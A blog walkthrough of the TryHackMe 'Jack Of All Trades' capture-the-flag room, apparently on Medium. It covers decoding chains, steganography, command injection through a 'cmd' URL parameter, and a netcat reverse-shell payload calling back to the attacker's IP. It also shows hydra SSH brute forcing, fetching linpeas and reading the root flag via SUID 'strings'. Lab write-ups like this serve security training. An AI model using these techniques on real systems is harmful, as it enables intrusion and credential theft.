TryHackMe - Jack Of All Trades

A new hacking journey, there are 2 flags waiting for us (user and root), let’s get them and conquer this challenge!

I started with a scan of the IP address I got, to see what we have running on the server. I found 2 open ports, 22 and 80, but there was something weird. The services that normally run on them were reversed, we had http on port 22 and ssh on port 80. Kinda weird, to be honest, but I went on with the analysis.

NMAP Scan
NMAP Scan

I configured the proxy settings in Firefox to be able to access the website on port 22. Not too much on its main page, just some things about Jack. Well, we could say that we have a potential user to work with later.

Web Site Home Page
Web Site Home Page

I checked then the source code for this page and I found something in a comment, a subpage of the website and something that looked like and encoded string. Checking it, I figured out that it was encoded in base64.

Web Site Page Source
Web Site Page Source

I took that code and decoded it’s content, I got a password.

Web Site Discovered Password
Web Site Discovered Password

For the moment, I didn’t have too much to work with. I tried to ssh using “jack” as user and the one I just discovered as password but it didn’t work. But, I remembered that I have a page mentioned in the comment where I also got the base64 string. I tried to login there with the same credentials, but still didn’t work.

Web Site Sub Page
Web Site Sub Page

I checked the source code for this page and I found another encoded string.

New Encoded String
New Encoded String

I had a look at it and, based on the characters I saw that it had, I figured out it was base32 (you can also use online tools to detect the encoding type, there are plenty). After decoding it, it gave me a result that was encoded in hex. Decoded that one also and…guess what? Still an encoded string, but this time looked very clear that there has been encoded with Caesar Cipher. Checked all 26 possibilities and one of them finally gave an answer. It was a link, but when I accessed it, I just got an wikipedia page. Nothing too relevant though (at least that’s what I thought at that point, but it has a clue though - I discovered that in a different way).

Anyway, I also performed a scan with gobuster, to see if I can find some sub pages. After a simple scan (small.txt file was used), I found a subdirectory.

Gobuster Scan
Gobuster Scan

I accessed that page and I found some photos. The name of one of them made me suspect that there was some steganography involved so I checked if there was something there.

Photos Found
Photos Found

I checked that file with steghide, it asked me for a password. I remembered that I found a password at the beginning and I typed that one, it worked. I got a text file but I didn’t have there any info that I thought at. But it confirmed me that what I was doing was ok, I just had to check with a different image.

Steghide Image 1
Steghide Image 1

After doing the same thing, using the same password as before, with a different image, I found a file where I got some credentials! My first reaction was to try to connect via ssh with them, thing that I attempted, but it didn’t work.

Steghide Right Image
Steghide Right Image

Then, I remembered about the sub page I discovered earlier, that had a login form. I used those credentials and I got it!

Logged In Form Page
Logged In Form Page

Well, we have a message where we are told that, somehow, we should get him a ‘cmd’ and it will run that. Looked like ‘cmd’ would be the id, so I tried to run an simple command, ‘ls’. I added at the end of the URL “?cmd=ls” and pressed Enter. Seeing that it showed me 2 index.php files made me realise that we can exploit that. The next step? Run a command that involves a reverse shell, in order to get access to the server. Instead of “ls”, now I added the command to get the reverse shell, the whole needed part in the URL becoming :

?cmd=nc <MyTryHackMeIP> 4444 -e /bin/bash

Anyway, in order for this to work, I previously started a listener on port 4444 on my machine, with netcat, the command I used being nc -lvnp 4444.

After getting the access as www-data user, I spawned a shell in order to work better and checked the /home directory to see what user folders I can find. I saw the home folder of jack (I tried to enter but the permissions didn’t allow me) and another file, owned by root, named jacks_password_list. And there were full read permissions on it.

Obtained Shell
Obtained Shell

Well, I checked the content of that and there were several passwords inside. I saved them locally in a file. I tried again to ssh with the passwords from that list, using hydra, and, finally, I got in as jack!

Hydra Brute Force
Hydra Brute Force

I thought the flag was in a text file but the only thing I saw was a photo. I downloaded it locally, by running the following command in my local terminal:

scp -P 80 jack@10.10.94.26:/home/jack/user.jpg .

When I opened the image, the flag was written on it, as you can see below:

User Flag
User Flag

Now all I had left was the root flag. I checked if I could run any commands with sudo but I wasn’t able to. I also verified if there were any cron jobs that I could exploit but there wasn’t anything to work with. So I decided to upload linpeas.sh from my machine to the victim’s one. I started a http server with python3 in the location where I had the script I mentioned above and I used wget on the shell where I was connected as jack to download it. After getting it, I ran the script and checked if I could get anything useful to exploit.

Among the SUID files, I saw /usr/bin/strings, so I decided to use that to read the root flag file.

Linpeas Scan
Linpeas Scan

I assumed that this time I wasn’t getting a picture again, I tried to get the content of /root/root.txt using /usr/bin/strings executable and it worked, I managed to get the root flag.

Root Flag
Root Flag

That’s it, I found both flags required! I hope you found this useful!

--

--

--

Cybersecurity passioned

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

VS Code got another awesome update!

ACM UVa Practice the Fifth day(C++)

Understanding networks in Docker

Docker

Reduce Cost and Increase Productivity with Value Added IT Services from buzinessware — {link} -

FLUTTER IS THE FUTURE OF MOBILE APP DEVELOPMENT

Build it your way with Lando, Docker, and Drupal

Toward all-to-all connectivity with expressive gate sets and compilation

Launch Protocol Update

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
DonMichele

DonMichele

Cybersecurity passioned

More from Medium

Intro to ISAC — CyberDefense Walkthrough

TryHackMe: VulnNet Walkthrough

Roadmap to the world of networking and network security

TryHackMe | Game Zone | Write up